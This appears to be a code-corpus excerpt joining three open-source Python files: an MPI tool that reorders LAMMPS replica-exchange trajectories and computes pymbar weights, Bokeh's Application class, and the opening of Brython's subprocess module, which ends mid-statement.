only. Dependencies ------------ mpi4py pymbar (for getting configurational weights) tqdm (for printing pretty progress bars) StringIO (or io if in Python 3.x) """ import os, numpy as np, argparse, time, pickle from scipy.special import logsumexp from mpi4py import MPI from tqdm import tqdm import gzip, bz2 try: # python-2 from StringIO import StringIO as IOBuffer except ImportError: # python-3 from io import BytesIO as IOBuffer #### INITIALISE MPI #### # (note that all output on screen will be printed only on the ROOT proc) ROOT = 0 comm = MPI.COMM_WORLD me = comm.rank # my proc id nproc = comm.size #### HELPER FUNCTIONS #### def _get_nearest_temp(temps, query_temp): """ Helper function to get the nearest temp in a list from a given query_temp :param temps: list of temps. :param query_temp: query temp Returns: idx: index of nearest temp in the list out_temp: nearest temp from the list """ if isinstance(temps, list): temps = np.array(temps) return temps[np.argmin(np.abs(temps-query_temp))] def readwrite(trajfn, mode): """ Helper function for input/output LAMMPS traj files. Trajectories may be plain text, .gz or .bz2 compressed. :param trajfn: name of LAMMPS traj :param mode: "r" ("w") and "rb" ("wb") depending on read or write Returns: file pointer """ if trajfn.endswith(".gz"): of = gzip.open(trajfn, mode) #return gzip.GzipFile(trajfn, mode) elif trajfn.endswith(".bz2"): of = bz2.open(trajfn, mode) #return bz2.BZ2File(trajfn, mode) else: of = open(trajfn, mode) return of def get_replica_frames(logfn, temps, nswap, writefreq): """ Get a list of frames from each replica that is at a particular temp. Do this for all temps. :param logfn: master LAMMPS log file that contains the temp swap history of all replicas :param temps: list of all temps used in the REMD simulation. :param nswap: swap frequency of the REMD simulation :param writefreq: traj dump frequency in LAMMPS Returns: master_frametuple_dict: dict containing a tuple (replica #, frame #) for each temp. """ n_rep = len(temps) swap_history = np.loadtxt(logfn, skiprows = 3) master_frametuple_dict = dict( (n, []) for n in range(n_rep) ) # walk through the replicas print("Getting frames from all replicas at temperature:") for n in range(n_rep): print("%3.2f K" % temps[n]) rep_inds = [np.where(x[1:] == n)[0][0] for x in swap_history] # case-1: when frames are dumped faster than temp. swaps if writefreq <= nswap: for ii, i in enumerate(rep_inds[:-1]): start = int(ii * nswap / writefreq) stop = int( (ii+1) * nswap / writefreq) [master_frametuple_dict[n].append( (i,x) ) \ for x in range(start, stop)] # case-2: when temps. are swapped faster than dumping frames else: nskip = int(writefreq / nswap) [master_frametuple_dict[n].append( (i,ii) ) \ for ii, i in enumerate(rep_inds[0::nskip])] return master_frametuple_dict def get_byte_index(rep_inds, byteindfns, intrajfns): """ Get byte indices from (un-ordered) trajectories. :param rep_inds: indices of replicas to process on this proc :param byteindsfns: list of filenames that will contain the byte indices :param intrajfns: list of (unordered) input traj filenames """ for n in rep_inds: # check if the byte indices for this traj has aleady been computed if os.path.isfile(byteindfns[n]): continue # extract bytes fobj = readwrite(intrajfns[n], "rb") byteinds = [ [0,0] ] # place file pointer at first line nframe = 0 first_line = fobj.readline() cur_pos = fobj.tell() # status printed only for replica read on root proc # this assumes that each proc takes roughly the same time if me == ROOT: pb = tqdm(desc = "Reading replicas", leave = True, position = ROOT + 2*me, unit = "B/replica", unit_scale = True, unit_divisor = 1024) # start crawling through the bytes while True: next_line = fobj.readline() if len(next_line) == 0: break # this will only work with lammpstrj traj format. # this condition essentially checks periodic recurrences # of the token TIMESTEP. Each time it is found, # we have crawled through a frame (snapshot) if next_line == first_line: nframe += 1 byteinds.append( [nframe, cur_pos] ) if me == ROOT: pb.update() cur_pos = fobj.tell() if me == ROOT: pb.update(0) if me == ROOT: pb.close() # take care of the EOF cur_pos = fobj.tell() byteinds.append( [nframe+1, cur_pos] ) # dummy index for the EOF # write to file np.savetxt(byteindfns[n], np.array(byteinds), fmt = "%d") # close the trajfile object fobj.close() return def write_reordered_traj(temp_inds, byte_inds, outtemps, temps, frametuple_dict, nprod, writefreq, outtrajfns, infobjs): """ Reorders trajectories by temp. and writes them to disk :param temp_inds: list index of temps (in the list of all temps) for which reordered trajs will be produced on this proc. :param byte_inds: dict containing the (previously stored) byte indices for each replica file (key = replica number) :param outtemps: list of all temps for which to produce reordered trajs. :param temps: list of all temps used in the REMD simulation. :param outtrajfns: list of filenames for output (ordered) trajs. :param frametuple_dict: dict containing a tuple (replica #, frame #) for each temp. :param nprod: number of production timesteps. Last (nprod / writefreq) frames from the end will be written to disk. :param writefreq: traj dump frequency in LAMMPS :param infobjs: list of file pointers to input (unordered) trajs. """ nframes = int(nprod / writefreq) for n in temp_inds: # open string-buffer and file buf = IOBuffer() of = readwrite(outtrajfns[n], "wb") # get frames abs_temp_ind = np.argmin( abs(temps - outtemps[n]) ) frametuple = frametuple_dict[abs_temp_ind][-nframes:] # write frames to buffer if me == ROOT: pb = tqdm(frametuple, desc = ("Buffering trajectories for writing"), leave = True, position = ROOT + 2*me, unit = 'frame/replica', unit_scale = True) iterable = pb else: iterable = frametuple for i, (rep, frame) in enumerate(iterable): infobj = infobjs[rep] start_ptr = int(byte_inds[rep][frame,1]) stop_ptr = int(byte_inds[rep][frame+1,1]) byte_len = stop_ptr - start_ptr infobj.seek(start_ptr) buf.write(infobj.read(byte_len)) if me == ROOT: pb.close() # write buffer to disk if me == ROOT: print("Writing buffer to file") of.write(buf.getvalue()) of.close() buf.close() for i in infobjs: i.close() return def get_canonical_logw(enefn, frametuple_dict, temps, nprod, writefreq, kB): """ Gets configurational log-weights (logw) for each frame and at each temp. from the REMD simulation. ONLY WRITTEN FOR THE CANONICAL (NVT) ensemble. This weights can be used to calculate the ensemble averaged value of any simulation observable X at a given temp. T : <X> (T) = \sum_{k=1, ntemps} \sum_{n=1, nframes} w[idx][k,n] X[k,n] where nframes is the number of frames to use from each *reordered* traj :param enefn: ascii file (readable by numpy.loadtxt) containing an array u[r,n] of *total* potential energy for the n-th frame for the r-th replica. :param frametuple_dict: dict containing a tuple (replica #, frame #) for each temp. :param temps: array of temps. used in the REMD simulation :param nprod: number of production timesteps. Last (nprod / writefreq) frames from the end will be written to disk. :param writefreq: traj dump frequency in LAMMPS :param kB : Boltzmann constant to set the energy scale. Default is in kcal/mol Returns: logw: dict, logw[l][k,n] gives the log weights from the n-th frame of the k-th temp. *ordered* trajectory to reweight to the l-th temp. """ try: import pymbar except ImportError: print(""" Configurational log-weight calculation requires pymbar. Here are some options to install it: conda install -c omnia pymbar pip install --user pymbar sudo pip install pymbar To install the dev. version directly from github, use: pip install pip install git+https://github.com/choderalab/pymbar.git """) u_rn = np.loadtxt(enefn) ntemps = u_rn.shape[0] # number of temps. nframes = int(nprod / writefreq) # number of frames at each temp. # reorder the temps u_kn = np.zeros([ntemps, nframes], float) for k in range(ntemps): frame_tuple = frametuple_dict[k][-nframes:] for i, (rep, frame) in enumerate(frame_tuple): u_kn[k, i] = u_rn[rep, frame] # prep input for pymbar #1) array of frames at each temp. nframes_k = nframes * np.ones(ntemps, np.uint8) #2) inverse temps. for chosen energy scale beta_k = 1.0 / (kB * temps) #3) get reduced energies (*ONLY FOR THE CANONICAL ENSEMBLE*) u_kln = np.zeros([ntemps, ntemps, nframes], float) for k in range(ntemps): u_kln[k] = np.outer(beta_k, u_kn[k]) # run pymbar and extract the free energies print("\nRunning pymbar...") mbar = pymbar.mbar.MBAR(u_kln, nframes_k, verbose = True) f_k = mbar.f_k # (1 x k array) # calculate the log-weights print("\nExtracting log-weights...") log_nframes = np.log(nframes) logw = dict( (k, np.zeros([ntemps, nframes], float)) for k in range(ntemps) ) # get log-weights to reweight to this temp. for k in range(ntemps): for n in range(nframes): num = -beta_k[k] * u_kn[k,n] denom = f_k - beta_k[k] * u_kn[k,n] for l in range(ntemps): logw[l][k,n] = num - logsumexp(denom) - log_nframes return logw #### MAIN WORKFLOW #### if __name__ == "__main__": # accept user inputs parser = argparse.ArgumentParser(description = __doc__, formatter_class = argparse.RawDescriptionHelpFormatter) parser.add_argument("prefix", help = "Prefix of REMD LAMMPS trajectories.\ Supply full path. Trajectories assumed to be named as \ <prefix>.%%d.lammpstrj. \ Can be in compressed (.gz or .bz2) format. \ This is a required argument") parser.add_argument("-logfn", "--logfn", default = "log.lammps", help = "LAMMPS log file that contains swap history \ of temperatures among replicas. \ Default = 'lammps.log'") parser.add_argument("-tfn", "--tempfn", default = "temps.txt", help = "ascii file (readable by numpy.loadtxt) with \ the temperatures used in the REMD simulation.") parser.add_argument("-ns", "--nswap", type = int, help = "Swap frequency used in LAMMPS temper command") parser.add_argument("-nw", "--nwrite", type = int, default = 1, help = "Trajectory writing frequency used \ in LAMMPS dump command") parser.add_argument("-np", "--nprod", type = int, default = 0, help = "Number of timesteps to save in the reordered\ trajectories.\ This should be in units of the LAMMPS timestep") parser.add_argument("-logw", "--logw", action = 'store_true', help = "Supplying this flag \ calculates *canonical* (NVT ensemble) log weights") parser.add_argument("-e", "--enefn", help = "File that has n_replica x n_frames array\ of total potential energies") parser.add_argument("-kB", "--boltzmann_const", type = float, default = 0.001987, help = "Boltzmann constant in appropriate units. \ Default is kcal/mol") parser.add_argument("-ot", "--out_temps", nargs = '+', type = np.float64, help = "Reorder trajectories at these temperatures.\n \ Default is all temperatures used in the simulation") parser.add_argument("-od", "--outdir", default = ".", help = "All output will be saved to this directory") # parse inputs args = parser.parse_args() traj_prefix = os.path.abspath(args.prefix) logfn = os.path.abspath(args.logfn) tempfn = os.path.abspath(args.tempfn) nswap = args.nswap writefreq = args.nwrite nprod = args.nprod enefn = args.enefn if not enefn is None: enefn = os.path.abspath(enefn) get_logw = args.logw kB = args.boltzmann_const out_temps = args.out_temps outdir = os.path.abspath(args.outdir) if not os.path.isdir(outdir): if me == ROOT: os.mkdir(outdir) # check that all input files are present (only on the ROOT proc) if me == ROOT: if not os.path.isfile(tempfn): raise IOError("Temperature file %s not found." % tempfn) elif not os.path.isfile(logfn): raise IOError("LAMMPS log file %s not found." % logfn) elif get_logw and not os.path.isfile(enefn): raise IOError("Canonical log-weight calculation requested but\ energy file %s not found" % enefn) # get (unordered) trajectories temps = np.loadtxt(tempfn) ntemps = len(temps) intrajfns = ["%s.%d.lammpstrj" % (traj_prefix, k) for k in range(ntemps)] # check if the trajs. (or their zipped versions are present) for i in range(ntemps): this_intrajfn = intrajfns[i] x = this_intrajfn + ".gz" if os.path.isfile(this_intrajfn): continue elif os.path.isfile(this_intrajfn + ".gz"): intrajfns[i] = this_intrajfn + ".gz" elif os.path.isfile(this_intrajfn + ".bz2"): intrajfns[i] = this_intrajfn + ".bz2" else: if me == ROOT: raise IOError("Trajectory for replica # %d missing" % i) # set output filenames outprefix = os.path.join(outdir, traj_prefix.split('/')[-1]) outtrajfns = ["%s.%3.2f.lammpstrj.gz" % \ (outprefix, _get_nearest_temp(temps, t)) \ for t in out_temps] byteindfns = [os.path.join(outdir, ".byteind_%d.gz" % k) \ for k in range(ntemps)] frametuplefn = outprefix + '.frametuple.pickle' if get_logw: logwfn = outprefix + ".logw.pickle" # get a list of all frames at a particular temp visited by each replica # this is fast so run only on ROOT proc. master_frametuple_dict = {} if me == ROOT: master_frametuple_dict = get_replica_frames(logfn = logfn, temps = temps, nswap = nswap, writefreq = writefreq) # save to a pickle from the ROOT proc with open(frametuplefn, 'wb') as of: pickle.dump(master_frametuple_dict, of) # broadcast to all procs master_frametuple_dict = comm.bcast(master_frametuple_dict, root = ROOT) # define a chunk of replicas to process on each proc CHUNKSIZE_1 = int(ntemps/nproc) if me < nproc - 1: my_rep_inds = range( (me*CHUNKSIZE_1), (me+1)*CHUNKSIZE_1 ) else: my_rep_inds = range( (me*CHUNKSIZE_1), ntemps ) # get byte indices from replica (un-ordered) trajs. in parallel get_byte_index(rep_inds = my_rep_inds, byteindfns = byteindfns, intrajfns = intrajfns) # block until all procs have finished comm.barrier() # open all replica files for reading infobjs = [readwrite(i, "rb") for i in intrajfns] # open all byteindex files byte_inds = dict( (i, np.loadtxt(fn)) for i, fn in enumerate(byteindfns) ) # define a chunk of output trajs. to process for each proc. # # of reordered trajs. to write may be less than the total # of replicas # which is usually equal to the requested nproc. If that is indeed the case, # retire excess procs n_out_temps = len(out_temps) CHUNKSIZE_2 = int(n_out_temps / nproc) if CHUNKSIZE_2 == 0: nproc_active = n_out_temps CHUNKSIZE_2 = 1 if me == ROOT: print("\nReleasing %d excess procs" % (nproc - nproc_active)) else: nproc_active = nproc if me < nproc_active-1: my_temp_inds = range( (me*CHUNKSIZE_2), (me+1)*CHUNKSIZE_1 ) else: my_temp_inds = range( (me*CHUNKSIZE_2), n_out_temps) # retire the excess procs # dont' forget to close any open file objects if me >= nproc_active: for fobj in infobjs: fobj.close() exit() # write reordered trajectories to disk from active procs in parallel write_reordered_traj(temp_inds = my_temp_inds, byte_inds = byte_inds, outtemps = out_temps, temps = temps, frametuple_dict = master_frametuple_dict, nprod = nprod, writefreq = writefreq, outtrajfns = outtrajfns, infobjs = infobjs) # calculate canonical log-weights if requested # usually this is very fast so retire all but the ROOT proc if not get_logw: exit() if not me == ROOT: exit() logw = get_canonical_logw(enefn = enefn, temps = temps, frametuple_dict = master_frametuple_dict, nprod = nprod, writefreq = writefreq, kB = kB) # save the logweights to a pickle with open(logwfn, 'wb') as of: pickle.dump(logw, of)
gpl-2.0
maxalbert/bokeh
bokeh/application/application.py
2
1422
''' ''' from __future__ import absolute_import import logging log = logging.getLogger(__name__) from ..document import Document class Application(object): ''' An Application is a factory for Document instances. ''' def __init__(self, *handlers): self._handlers = list(handlers) # TODO (havocp) should this potentially create multiple documents? # or does multiple docs mean multiple Application? def create_document(self): ''' Loads a new document using the Application's handlers to fill it in. ''' doc = Document() for h in self._handlers: # TODO (havocp) we need to check the 'failed' flag on each handler # and build a composite error display. h.modify_document(doc) if h.failed: log.error("Error running application handler %r: %s %s ", h, h.error, h.error_detail) # A future server setting could make it configurable whether to do this, # since it has some performance impact probably. Let's see if we need to. doc.validate() return doc def add(self, handler): ''' Add a handler to the pipeline used to initialize new documents. Args: handler (Handler) : a handler to process this Application ''' self._handlers.append(handler) @property def handlers(self): return tuple(self._handlers)
bsd-3-clause
40223240/2015cdb_g3_40223240
static/Brython3.1.1-20150328-091302/Lib/subprocess.py
728
67282
# subprocess - Subprocesses with accessible I/O streams # # For more information about this module, see PEP 324. # # Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se> # # Licensed to PSF under a Contributor Agreement. # See http://www.python.org/2.4/license for licensing details. r"""subprocess - Subprocesses with accessible I/O streams This module allows you to spawn processes, connect to their input/output/error pipes, and obtain their return codes. This module intends to replace several other, older modules and functions, like: os.system os.spawn* Information about how the subprocess module can be used to replace these modules and functions can be found below. Using the subprocess module =========================== This module defines one class called Popen: class Popen(args, bufsize=-1, executable=None, stdin=None, stdout=None, stderr=None, preexec_fn=None, close_fds=True, shell=False, cwd=None, env=None, universal_newlines=False, startupinfo=None, creationflags=0, restore_signals=True, start_new_session=False, pass_fds=()): Arguments are: args should be a string, or a sequence of program arguments. The program to execute is normally the first item in the args sequence or string, but can be explicitly set by using the executable argument. On POSIX, with shell=False (default): In this case, the Popen class uses os.execvp() to execute the child program. args should normally be a sequence. A string will be treated as a sequence with the string as the only item (the program to execute). On POSIX, with shell=True: If args is a string, it specifies the command string to execute through the shell. If args is a sequence, the first item specifies the command string, and any additional items will be treated as additional shell arguments. On Windows: the Popen class uses CreateProcess() to execute the child program, which operates on strings. If args is a sequence, it will be converted to a string using the list2cmdline method. Please note that not all MS Windows applications interpret the command line the same way: The list2cmdline is designed for applications using the same rules as the MS C runtime. bufsize will be supplied as the corresponding argument to the io.open() function when creating the stdin/stdout/stderr pipe file objects: 0 means unbuffered (read & write are one system call and can return short), 1 means line buffered, any other positive value means use a buffer of approximately that size. A negative bufsize, the default, means the system default of io.DEFAULT_BUFFER_SIZE will be used. stdin, stdout and stderr specify the executed programs' standard input, standard output and standard error file handles, respectively. Valid values are PIPE, an existing file descriptor (a positive integer), an existing file object, and None. PIPE indicates that a new pipe to the child should be created. With None, no redirection will occur; the child's file handles will be inherited from the parent. Additionally, stderr can be STDOUT, which indicates that the stderr data from the applications should be captured into the same file handle as for stdout. On POSIX, if preexec_fn is set to a callable object, this object will be called in the child process just before the child is executed. The use of preexec_fn is not thread safe, using it in the presence of threads could lead to a deadlock in the child process before the new executable is executed. If close_fds is true, all file descriptors except 0, 1 and 2 will be closed before the child process is executed. The default for close_fds varies by platform: Always true on POSIX. True when stdin/stdout/stderr are None on Windows, false otherwise. pass_fds is an optional sequence of file descriptors to keep open between the parent and child. Providing any pass_fds implicitly sets close_fds to true. if shell is true, the specified command will be executed through the shell. If cwd is not None, the current directory will be changed to cwd before the child is executed. On POSIX, if restore_signals is True all signals that Python sets to SIG_IGN are restored to SIG_DFL in the child process before the exec. Currently this includes the SIGPIPE, SIGXFZ and SIGXFSZ signals. This parameter does nothing on Windows. On POSIX, if start_new_session is True, the setsid() system call will be made in the child process prior to executing the command. If env is not None, it defines the environment variables for the new process. If universal_newlines is false, the file objects stdin, stdout and stderr are opened as binary files, and no line ending conversion is done. If universal_newlines is true, the file objects stdout and stderr are opened as a text files, but lines may be terminated by any of '\n', the Unix end-of-line convention, '\r', the old Macintosh convention or '\r\n', the Windows convention. All of these external representations are seen as '\n' by the Python program. Also, the newlines attribute of the file objects stdout, stdin and stderr are not updated by the communicate() method. The startupinfo and creationflags, if given, will be passed to the underlying CreateProcess() function. They can specify things such as appearance of the main window and priority for the new process. (Windows only) This module also defines some shortcut functions: call(*popenargs, **kwargs): Run command with arguments. Wait for command to complete, then return the returncode attribute. The arguments are the same as for the Popen constructor. Example: >>> retcode = subprocess.call(["ls", "-l"]) check_call(*popenargs, **kwargs): Run command with arguments. Wait for command to complete. If the exit code was zero then return, otherwise raise CalledProcessError. The CalledProcessError object will have the return code in the returncode attribute. The arguments are the same as for the Popen constructor. Example: >>> subprocess.check_call(["ls", "-l"]) 0 getstatusoutput(cmd): Return (status, output) of executing cmd in a shell. Execute the string 'cmd' in a shell with os.popen() and return a 2-tuple (status, output). cmd is actually run as '{ cmd ; } 2>&1', so that the returned output will contain output or error messages. A trailing newline is stripped from the output. The exit status for the command can be interpreted according to the rules for the C function wait(). Example: >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file or directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: not found') getoutput(cmd): Return output (stdout or stderr) of executing cmd in a shell. Like getstatusoutput(), except the exit status is ignored and the return value is a string containing the command's output. Example: >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' check_output(*popenargs, **kwargs): Run command with arguments and return its output. If the exit code was non-zero it raises a CalledProcessError. The CalledProcessError object will have the return code in the returncode attribute and output in the output attribute. The arguments are the same as for the Popen constructor. Example: >>> output = subprocess.check_output(["ls", "-l", "/dev/null"]) Exceptions ---------- Exceptions raised in the child process, before the new program has started to execute, will be re-raised in the parent. Additionally, the exception object will have one extra attribute called 'child_traceback', which is a string containing traceback information from the child's point of view. The most common exception raised is OSError. This occurs, for example, when trying to execute a non-existent file. Applications should prepare for OSErrors. A ValueError will be raised if Popen is called with invalid arguments. Exceptions defined within this module inherit from SubprocessError. check_call() and check_output() will raise CalledProcessError if the called process returns a non-zero return code. TimeoutExpired be raised if a timeout was specified and expired. Security -------- Unlike some other popen functions, this implementation will never call /bin/sh implicitly. This means that all characters, including shell metacharacters, can safely be passed to child processes. Popen objects ============= Instances of the Popen class have the following methods: poll() Check if child process has terminated. Returns returncode attribute. wait() Wait for child process to terminate. Returns returncode attribute. communicate(input=None) Interact with process: Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate. The optional input argument should be a string to be sent to the child process, or None, if no data should be sent to the child. communicate() returns a tuple (stdout, stderr). Note: The data read is buffered in memory, so do not use this method if the data size is large or unlimited. The following attributes are also available: stdin If the stdin argument is PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None. stdout If the stdout argument is PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None. stderr If the stderr argument is PIPE, this attribute is file object that provides error output from the child process. Otherwise, it is None. pid The process ID of the child process. returncode The child return code. A None value indicates that the process hasn't terminated yet. A negative value -N indicates that the child was terminated by signal N (POSIX only). Replacing older functions with the subprocess module ==================================================== In this section, "a ==> b" means that b can be used as a replacement for a. Note: All functions in this section fail (more or less) silently if the executed program cannot be found; this module raises an OSError exception. In the following examples, we assume that the subprocess module is imported with "from subprocess import *". Replacing /bin/sh shell backquote --------------------------------- output=`mycmd myarg` ==> output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0] Replacing shell pipe line ------------------------- output=`dmesg | grep hda` ==> p1 = Popen(["dmesg"], stdout=PIPE) p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE) output = p2.communicate()[0] Replacing os.system() --------------------- sts = os.system("mycmd" + " myarg") ==> p = Popen("mycmd" + " myarg", shell=True) pid, sts = os.waitpid(p.pid, 0) Note: * Calling the program through the shell is usually not required. * It's easier to look at the returncode attribute than the exitstatus. A more real-world example would look like this: try: retcode = call("mycmd" + " myarg", shell=True) if retcode < 0: print("Child was terminated by signal", -retcode, file=sys.stderr) else: print("Child returned", retcode, file=sys.stderr) except OSError as e: print("Execution failed:", e, file=sys.stderr) Replacing os.spawn* ------------------- P_NOWAIT example: pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg") ==> pid = Popen(["/bin/mycmd", "myarg"]).pid P_WAIT example: retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg") ==> retcode = call(["/bin/mycmd", "myarg"]) Vector example: os.spawnvp(os.P_NOWAIT, path, args) ==> Popen([path] + args[1:]) Environment example: os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env) ==> Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"}) """ import sys mswindows = (sys.platform == "win32") import io import os import time import traceback import gc import signal import builtins import warnings import errno try: from time import monotonic as _time except ImportError: from time import time as _time # Exception classes used by this module. class SubprocessError(Exception): pass class CalledProcessError(SubprocessError): """This exception is raised when a process run by check_call() or check_output() returns a non-zero exit status. The exit status will be stored in the returncode attribute; check_output() will also store the output in the output attribute. """ def __init__(self, returncode, cmd, output=None): self.returncode = returncode self.cmd = cmd self.output = output def __str__(self): return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode) class TimeoutExpired(SubprocessError): """This exception is raised when the timeout expires while waiting for a child process. """ def __init__(self, cmd, timeout, output=None): self.cmd = cmd self.timeout = timeout self.output = output def __str__(self): return ("Command '%s' timed out after %s seconds" % (self.cmd, self.timeout)) if mswindows: import threading import msvcrt import _winapi class STARTUPINFO: dwFlags = 0 hStdInput = None hStdOutput = None hStdError = None wShowWindow = 0 class pywintypes: error = IOError else: import select _has_poll = hasattr(select, 'poll') import _posixsubprocess _create_pipe = _posixsubprocess.cloexec_pipe # When select or poll has indicated that the file is writable, # we can write up to _PIPE_BUF bytes without risk of blocking. # POSIX defines PIPE_BUF as >= 512. _PIPE_BUF = getattr(select, 'PIPE_BUF', 512) __all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "getstatusoutput", "getoutput", "check_output", "CalledProcessError", "DEVNULL"] if mswindows: from _winapi import (CREATE_NEW_CONSOLE, CREATE_NEW_PROCESS_GROUP, STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE, SW_HIDE, STARTF_USESTDHANDLES, STARTF_USESHOWWINDOW) __all__.extend(["CREATE_NEW_CONSOLE", "CREATE_NEW_PROCESS_GROUP", "STD_INPUT_HANDLE", "STD_OUTPUT_HANDLE", "STD_ERROR_HANDLE", "SW_HIDE", "STARTF_USESTDHANDLES", "STARTF_USESHOWWINDOW"]) class Handle(int): closed = False def Close(self, CloseHandle=_winapi.CloseHandle): if not self.closed: self.closed = True CloseHandle(self) def Detach(self): if not self.closed: self.closed = True return int(self) raise ValueError("already closed") def __repr__(self): return "Handle(%d)" % int(self) __del__ = Close __str__ = __repr__ try: MAXFD = os.sysconf("SC_OPEN_MAX") except: MAXFD = 256 # This lists holds Popen instances for which the underlying process had not # exited at the time its __del__ method got called: those processes are wait()ed # for synchronously from _cleanup() when a new Popen object is created, to avoid # zombie processes. _active = [] def _cleanup(): for inst in _active[:]: res = inst._internal_poll(_deadstate=sys.maxsize) if res is not None: try: _active.remove(inst) except ValueError: # This can happen if two threads create a new Popen instance. # It's harmless that it was already removed, so ignore. pass PIPE = -1 STDOUT = -2 DEVNULL = -3 def _eintr_retry_call(func, *args): while True: try: return func(*args) except InterruptedError: continue # XXX This function is only used by multiprocessing and the test suite, # but it's here so that it can be imported when Python is compiled without # threads. def _args_from_interpreter_flags(): """Return a list of command-line arguments reproducing the current settings in sys.flags and sys.warnoptions.""" flag_opt_map = { 'debug': 'd', # 'inspect': 'i', # 'interactive': 'i', 'optimize': 'O', 'dont_write_bytecode': 'B', 'no_user_site': 's', 'no_site': 'S', 'ignore_environment': 'E', 'verbose': 'v', 'bytes_warning': 'b', 'quiet': 'q', 'hash_randomization': 'R', } args = [] for flag, opt in flag_opt_map.items(): v = getattr(sys.flags, flag) if v > 0: args.append('-' + opt * v) for opt in sys.warnoptions: args.append('-W' + opt) return args def call(*popenargs, timeout=None, **kwargs): """Run command with arguments. Wait for command to complete or timeout, then return the returncode attribute. The arguments are the same as for the Popen constructor. Example: retcode = call(["ls", "-l"]) """ with Popen(*popenargs, **kwargs) as p: try: return p.wait(timeout=timeout) except: p.kill() p.wait() raise def check_call(*popenargs, **kwargs): """Run command with arguments. Wait for command to complete. If the exit code was zero then return, otherwise raise CalledProcessError. The CalledProcessError object will have the return code in the returncode attribute. The arguments are the same as for the call function. Example: check_call(["ls", "-l"]) """ retcode = call(*popenargs, **kwargs) if retcode: cmd = kwargs.get("args") if cmd is None: cmd = popenargs[0] raise CalledProcessError(retcode, cmd) return 0 def check_output(*popenargs, timeout=None, **kwargs): r"""Run command with arguments and return its output. If the exit code was non-zero it raises a CalledProcessError. The CalledProcessError object will have the return code in the returncode attribute and output in the output attribute. The arguments are the same as for the Popen constructor. Example: >>> check_output(["ls", "-l", "/dev/null"]) b'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n' The stdout argument is not allowed as it is used internally. To capture standard error in the result, use stderr=STDOUT. >>> check_output(["/bin/sh", "-c", ... "ls -l non_existent_file ; exit 0"], ... stderr=STDOUT) b'ls: non_existent_file: No such file or directory\n' If universal_newlines=True is passed, the return value will be a string rather than bytes. """ if 'stdout' in kwargs: raise ValueError('stdout argument not allowed, it will be overridden.') with Popen(*popenargs, stdout=PIPE, **kwargs) as process: try: output, unused_err = process.communicate(timeout=timeout) except TimeoutExpired: process.kill() output, unused_err = process.communicate() raise TimeoutExpired(process.args, timeout, output=output) except: process.kill() process.wait() raise retcode = process.poll() if retcode: raise CalledProcessError(retcode, process.args, output=output) return output def list2cmdline(seq): """ Translate a sequence of arguments into a command line string, using the same rules as the MS C runtime: 1) Arguments are delimited by white space, which is either a space or a tab. 2) A string surrounded by double quotation marks is interpreted as a single argument, regardless of white space contained within. A quoted string can be embedded in an argument. 3) A double quotation mark preceded by a backslash is interpreted as a literal double quotation mark. 4) Backslashes are interpreted literally, unless they immediately precede a double quotation mark. 5) If backslashes immediately precede a double quotation mark, every pair of backslashes is interpreted as a literal backslash. If the number of backslashes is odd, the last backslash escapes the next double quotation mark as described in rule 3. """ # See # http://msdn.microsoft.com/en-us/library/17w5ykft.aspx # or search http://msdn.microsoft.com for # "Parsing C++ Command-Line Arguments" result = [] needquote = False for arg in seq: bs_buf = [] # Add a space to separate this argument from the others if result: result.append(' ') needquote = (" " in arg) or ("\t" in arg) or not arg if needquote: result.append('"') for c in arg: if c == '\\': # Don't know if we need to double yet. bs_buf.append(c) elif c == '"': # Double backslashes. result.append('\\' * len(bs_buf)*2) bs_buf = [] result.append('\\"') else: # Normal char if bs_buf: result.extend(bs_buf) bs_buf = [] result.append(c) # Add remaining backslashes, if any. if bs_buf: result.extend(bs_buf) if needquote: result.extend(bs_buf) result.append('"') return ''.join(result) # Various tools for executing commands and looking at their output and status. # # NB This only works (and is only relevant) for POSIX. def getstatusoutput(cmd): """Return (status, output) of executing cmd in a shell. Execute the string 'cmd' in a shell with os.popen() and return a 2-tuple (status, output). cmd is actually run as '{ cmd ; } 2>&1', so that the returned output will contain output or error messages. A trailing newline is stripped from the output. The exit status for the command can be interpreted according to the rules for the C function wait(). Example: >>> import subprocess >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file or directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: not found') """ with os.popen('{ ' + cmd + '; } 2>&1', 'r') as pipe: try: text = pipe.read() sts = pipe.close() except: process = pipe._proc process.kill() process.wait() raise if sts is None: sts = 0 if text[-1:] == '\n': text = text[:-1] return sts, text def getoutput(cmd): """Return output (stdout or stderr) of executing cmd in a shell. Like getstatusoutput(), except the exit status is ignored and the return value is a string containing the command's output. Example: >>> import subprocess >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' """ return getstatusoutput(cmd)[1] _PLATFORM_DEFAULT_CLOSE_FDS = object() class Popen(object): def __init__(self, args, bufsize=-1, executable=None, stdin=None, stdout=None, stderr=None, preexec_fn=None, close_fds=_PLATFORM_DEFAULT_CLOSE_FDS, shell=False, cwd=None, env=None, universal_newlines=False, startupinfo=None, creationflags=0, restore_signals=True, start_new_session=False, pass_fds=()): """Create new Popen instance.""" _cleanup() self._child_created = False self._input = None self._communication_started = False if bufsize is None: bufsize = -1 # Restore default if not isinstance(bufsize, int): raise TypeError("bufsize must be an integer") if mswindows: if preexec_fn is not None: raise ValueError("preexec_fn is not supported on Windows " "platforms") any_stdio_set = (stdin is not None or 